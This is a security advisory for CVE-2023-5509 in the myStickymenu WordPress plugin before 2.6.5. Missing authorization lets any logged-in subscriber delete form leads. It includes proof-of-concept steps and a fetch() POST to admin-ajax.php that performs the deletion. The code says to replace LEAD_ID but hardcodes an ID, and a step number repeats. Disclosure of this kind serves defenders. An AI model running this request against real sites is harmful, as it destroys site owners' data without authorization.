myStickymenu < 2.6.5 – Subscriber+ Arbitrary Form Leads Deletion | CVE 2023-5509

Description

The plugin does not adequately authorize some ajax calls, allowing any logged-in user to perform the actions.

Proof of Concept

1. Visit myStickymenu > + Create new Welcome Bar. Ensure "Collect leads" is enabled, enable the toggle at the top, and Save.
2. In a logged-out window, fill the lead form in the sticky bar. As an admin, confirm that a lead has been generated, and take note of the ID.
3. Log in as a subscriber and visit the frontend. Run the following code, replacing LEAD_ID with the ID of the generated lead from the previous step.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": 'action=my_sticky_menu_bulks&bulks[]=3&wpnonce=' + welcomebar_frontjs.ajax_nonce,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

3. See that the lead has been deleted.